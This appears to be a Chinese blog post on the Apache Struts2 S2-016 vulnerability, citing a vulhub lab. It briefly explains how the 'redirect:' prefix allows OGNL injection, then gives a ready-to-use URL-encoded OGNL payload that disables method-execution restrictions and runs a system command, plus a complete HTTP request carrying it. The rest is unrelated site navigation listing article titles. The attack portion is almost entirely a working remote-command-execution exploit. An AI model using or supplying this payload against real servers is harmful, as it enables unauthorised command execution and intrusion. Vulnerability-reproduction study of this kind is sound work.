struts2 s2-016

参考:https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md

DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令

payload

执行系统命令:ls /usr

redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%20/usr%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D

数据包

GET /index.action?redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%20/usr%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1

Host: xxx.xxxx.xxx.xxx:8080

Connection: close

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 MicroMessenger/7.0.9.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat

content-type: application/json;charset=utf-8

Accept-Encoding: gzip, deflate

返回结果

最新文章

  1. Linux 基础命令
  2. Linux如何搜索查找文件里面内容
  3. 使用 T-SQL 计算当日日期、本周第一天与最后一天
  4. hdu1051 Wooden Sticks
  5. eclipse报错 com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 转
  6. Swift中构造器的继承和重写
  7. LeetCode OJ 153. Find Minimum in Rotated Sorted Array
  8. 剑指Offer——中国银行面试知识储备
  9. react-native添加react-native-vector-icons插件android遇到的问题
  10. 远程桌面访问linux
  11. python中的命名元组namedtuple
  12. 校园网ipv6连接问题
  13. [Luogu 3707] SDOI2017 相关分析
  14. HDU.1847 Good Luck in CET-4 Everybody! ( 博弈论 SG分析)
  15. 多核CPU上python多线程并行的一个假象
  16. 关于一些对location认识的误区
  17. HDU 2665 Kth number(可持续化线段树)
  18. c++分块算法(暴力数据结构)
  19. 【LG2495】[SDOI2011]消耗战
  20. CTSC/APIO2018 帝都一周游

热门文章

  1. Python + logging 控制台有日志输出,但日志文件中数据为空
  2. python 之用户自定义函数
  3. Django TypeError at /login/ 'bool' object is not callable
  4. JDBC基础学习笔记
  5. Flutter异常监控 - 贰 | 框架Catcher原理分析
  6. 刷题笔记——2758.打印ASCII码 & 2759.打印字符
  7. 移动端安卓开发学习记录--Android Studio打断点调试操作步骤记录
  8. flutter 1.升级2.X在模型类中序列化JSON报错Non-nullable instance field 'title' must be initialized.
  9. 在Typescript项目中,使用ESLint和Prettier,以及解决保存代码后ESLint配置冲突问题
  10. 性能浪费的日志案例-使用Lambda优化日志案例